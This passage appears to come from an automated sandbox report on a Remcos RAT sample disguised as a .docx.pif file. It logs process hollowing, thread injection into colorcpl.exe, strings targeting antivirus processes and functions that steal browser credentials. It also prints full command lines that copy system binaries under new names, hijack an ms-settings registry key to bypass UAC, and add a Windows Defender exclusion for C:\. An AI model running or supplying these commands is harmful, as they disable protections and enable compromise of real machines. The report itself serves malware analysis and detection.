Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
Source: C:\Users\Public\xkn.exe	Process created: C:\Users\Public\alpha.exe "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\ger.exe C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process created: C:\Users\Public\alpha.exe "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\ger.exe C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Memory allocated: C:\Users\Public\Libraries\drbdmeyP.pif base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Memory allocated: C:\Users\Public\Libraries\drbdmeyP.pif base: 18160000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Memory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 6420000 protect: page execute and read and write	Jump to behavior

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe

Thread created: C:\Windows\SysWOW64\colorcpl.exe EIP: 6421617

Jump to behavior

Drops or copies cmd.exe with a different name (likely to bypass HIPS)

Source: C:\Windows\System32\extrac32.exe

File created: C:\Users\Public\alpha.exe

Jump to dropped file

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe

Memory written: C:\Windows\SysWOW64\colorcpl.exe base: 6420000 value starts with: 4D5A

Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe

Section unmapped: C:\Users\Public\Libraries\drbdmeyP.pif base address: 400000

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Memory written: C:\Users\Public\Libraries\drbdmeyP.pif base: 3F8008			Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Memory written: C:\Windows\SysWOW64\colorcpl.exe base: 6420000			Jump to behavior

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe

31_2_045920F7

Contains functionality to simulate mouse events

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 31_2_04599627 mouse_event,

31_2_04599627

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process created: C:\Users\Public\Libraries\drbdmeyP.pif C:\Users\Public\Libraries\drbdmeyP.pif	Jump to behavior
Source: C:\Users\Public\Libraries\drbdmeyP.pif	Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\D2F6.tmp\D2F7.tmp\D2F8.bat C:\Users\Public\Libraries\drbdmeyP.pif"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows \System32\per.exe "C:\\Windows \\System32\\per.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c ping 127.0.0.1 -n 2	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process created: C:\Users\Public\alpha.exe "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\ger.exe C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM SystemSettings.exe
Source: C:\Users\Public\alpha.exe	Process created: unknown unknown

Uses taskkill to terminate processes

Source: C:\Users\Public\alpha.exe

Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM SystemSettings.exe

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe c:\\users\\public\\alpha /c c:\\users\\public\\xkn -windowstyle hidden -command "c:\\users\\public\\alpha /c c:\\users\\public\\ger add hkcu\software\classes\ms-settings\shell\open\command /f /ve /t reg_sz /d 'c:\\users\\public\\xkn -windowstyle hidden -command "add-mppreference -exclusionpath c:\"' ; "
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\xkn.exe c:\\users\\public\\xkn -windowstyle hidden -command "c:\\users\\public\\alpha /c c:\\users\\public\\ger add hkcu\software\classes\ms-settings\shell\open\command /f /ve /t reg_sz /d 'c:\\users\\public\\xkn -windowstyle hidden -command "add-mppreference -exclusionpath c:\"' ; "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe c:\\users\\public\\alpha /c c:\\users\\public\\xkn -windowstyle hidden -command "c:\\users\\public\\alpha /c c:\\users\\public\\ger add hkcu\software\classes\ms-settings\shell\open\command /f /ve /t reg_sz /d 'c:\\users\\public\\xkn -windowstyle hidden -command "add-mppreference -exclusionpath c:\"' ; "	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\xkn.exe c:\\users\\public\\xkn -windowstyle hidden -command "c:\\users\\public\\alpha /c c:\\users\\public\\ger add hkcu\software\classes\ms-settings\shell\open\command /f /ve /t reg_sz /d 'c:\\users\\public\\xkn -windowstyle hidden -command "add-mppreference -exclusionpath c:\"' ; "	Jump to behavior

Source: colorcpl.exe, 0000001F.00000002.3694699773.000000000281F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: colorcpl.exe, 0000001F.00000002.3694699773.000000000281F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerQ3\
Source: colorcpl.exe, 0000001F.00000002.3694699773.000000000281F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managern.
Source: colorcpl.exe, 0000001F.00000002.3694699773.000000000281F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager404
Source: colorcpl.exe, 0000001F.00000002.3694699773.000000000281F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager404:0
Source: colorcpl.exe, 0000001F.00000002.3694699773.000000000281F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerknown.
Source: colorcpl.exe, 0000001F.00000002.3694699773.000000000281F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager404n.
Source: colorcpl.exe, 0000001F.00000002.3694699773.000000000281F000.00000004.00000020.00020000.00000000.sdmp, logs.dat.31.dr	Binary or memory string: [Program Manager]

Contains functionality to query CPU information (cpuid)

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 31_2_045B4C52 cpuid

31_2_045B4C52

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,RtlMoveMemory,GetCurrentProcess,EnumSystemLocalesA,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,ExitProcess,	0_2_0299DAA4
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	0_2_02985A78
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: GetCurrentProcess,EnumSystemLocalesA,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,ExitProcess,	0_2_029A5E01
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: GetLocaleInfoA,	0_2_0298A7A0
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: GetLocaleInfoA,	0_2_0298A754
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	0_2_02985B84
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,RtlMoveMemory,GetCurrentProcess,EnumSystemLocalesA,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,ExitProcess,	0_2_0299DAA4
Source: C:\Users\Public\alpha.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,	8_2_00007FF64B5751EC
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,	8_2_00007FF64B566EE4
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,	8_2_00007FF64B573140
Source: C:\Users\Public\alpha.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,	10_2_00007FF64B5751EC
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,	10_2_00007FF64B566EE4
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,	10_2_00007FF64B573140
Source: C:\Users\Public\alpha.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,	12_2_00007FF64B5751EC
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,	12_2_00007FF64B566EE4
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,	12_2_00007FF64B573140
Source: C:\Users\Public\alpha.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,	14_2_00007FF64B5751EC
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,	14_2_00007FF64B566EE4
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,	14_2_00007FF64B573140
Source: C:\Users\Public\alpha.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,	17_2_00007FF64B5751EC
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,	17_2_00007FF64B566EE4
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,	17_2_00007FF64B573140
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: EnumSystemLocalesW,	31_2_045C8404
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	31_2_045D243C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoW,	31_2_045D2543
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	31_2_045D2610
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: EnumSystemLocalesW,	31_2_045D2036
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	31_2_045D20C3
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoW,	31_2_045D2313
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	31_2_045D1CD8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: EnumSystemLocalesW,	31_2_045D1F50
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: EnumSystemLocalesW,	31_2_045D1F9B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoA,	31_2_0458F8D1
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoW,	31_2_045C88ED

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\alpha.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\xkn.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\Public\xkn.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\xkn.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\xkn.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\alpha.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe

Code function: 0_2_0298919C GetLocalTime,

0_2_0298919C

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 31_2_0459B60D GetUserNameW,

31_2_0459B60D

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 31_2_045C9190 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

31_2_045C9190

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe

Code function: 0_2_0298B71C GetVersionExA,

0_2_0298B71C

Source: C:\Users\Public\xkn.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

AV process strings found (often used to terminate AV products)

Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: cmdagent.exe
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: quhlpsvc.exe
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: avgamsvr.exe
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: TMBMSRV.exe
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Vsserv.exe
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: avgupsvc.exe
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: avgemc.exe
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Remcos RAT

Source: Yara match	File source: 31.2.colorcpl.exe.4580000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.colorcpl.exe.64218af.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.colorcpl.exe.64218af.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.colorcpl.exe.4580000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.colorcpl.exe.6420000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.colorcpl.exe.6420000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001F.00000002.3702973204.0000000004580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.3694699773.000000000281F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.3705302881.0000000006420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 7688, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\gaban\logs.dat, type: DROPPED

Contains functionality to steal Chrome passwords or cookies

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data

31_2_0458BA12

Contains functionality to steal Firefox passwords or cookies

